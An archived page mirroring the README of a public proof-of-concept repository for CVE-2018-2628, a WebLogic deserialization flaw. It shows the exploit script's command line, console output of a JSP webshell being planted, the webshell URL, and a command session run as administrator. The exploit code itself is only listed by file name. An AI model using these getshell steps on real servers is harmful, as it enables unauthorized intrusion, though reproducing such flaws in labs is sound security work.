Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-2628 PoC — Oracle Fusion Middleware 代码问题漏洞

Source
https://github.com/jas502n/CVE-2018-2628
Associated Vulnerability
Title:Oracle Fusion Middleware 代码问题漏洞 (CVE-2018-2628)
Description:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务器,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。WLS Core是其中的一个核心组件。 Oracle WebLogic Server中的WLS核心组件存在远程代码执行漏洞。攻击者可通过远程发送攻击数据,借助T3协议在WebLogic Server中执行反序列化操作利用该漏洞执行代码。以下版本受到影响:Oracle WebLogic Serve
Description
Weblogic 反序列化漏洞(CVE-2018-2628)
Readme
# CVE-2018-2628 WebLogic反序列化漏洞复现

## weblogic getshell

`python CVE-2018-2628-Getshell.py ip port shell1.jsp`

![](./getshell.jpg)
![](./curl-shell.jpg)

```
C:\Users\CTF\Desktop>python CVE-2018-2628-Getshell.py  10.10.20.166 7001 jason1.jsp

   _______      ________    ___   ___  __  ___      ___   __ ___   ___
  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \    |__ \ / /|__ \ / _ \
 | |     \ \  / /| |__ ______ ) | | | || | (_) |_____ ) / /_   ) | (_) |
 | |      \ \/ / |  __|______/ /| | | || |> _ <______/ / '_ \ / / > _ <
 | |____   \  /  | |____    / /_| |_| || | (_) |    / /| (_) / /_| (_) |
  \_____|   \/   |______|  |____|\___/ |_|\___/    |____\___/____|\___/


                          Weblogic Getshell
                                jas502n


handshake successful


 >>>>usage: python cve-2018-2628.py ip port shell1.jsp



>>>Shell File Upload Dir:

servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\jason1.jsp


>>>Getshell: http://10.10.20.166:7001/bea_wls_internal/jason1.jsp?tom=d2hvYW1pCg==

C:\Users\CTF\Desktop>
```


### python-poc
![](./cve-2018-2628-docker.jpg)
#### The Docker In Here! https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2018-2628/README.md
![](./cve-2018-2628-poc.jpg)

### 0x01 Nessus Scan

![](./images/CVE-2018-2628-scan.jpg)


### 0x02 K8 Tools GetShell

![](./images/GetShell.PNG)


### 0x03 CMD Query

![](./images/cmd.jpg)


#####  Use-Method:

```
> python cve-2018-2628.py

set url :http://xx.xx.xx.xx:8001/bea_wls_internal/wlscmd.jsp
cmd >>: whoami

win-xxx8cb989qh\administrator

cmd >>: net user

\\WIN-XXX8CB989QH 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest
命令成功完成。

cmd >>:
```
File Snapshot

 [4.0K]  /data/pocs/e733a50dcb83992a87a4d2be406ba48221f6b3b4
├── [364K]  curl-shell.jpg
├── [313K]  cve-2018-2628-docker.jpg
├── [ 10K]  CVE-2018-2628-Getshell.py
├── [1.0M]  cve-2018-2628-poc.jpg
├── [7.6K]  CVE-2018-2628-poc.py
├── [ 915]  cve-2018-2628.py
├── [405K]  getshell.jpg
├── [4.0K]  images
│   ├── [260K]  cmd.jpg
│   ├── [275K]  CVE-2018-2628-scan.jpg
│   └── [110K]  GetShell.PNG
├── [  52]  push.sh
├── [1.7K]  README.md
└── [ 724]  wlscmd.jsp

1 directory, 13 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.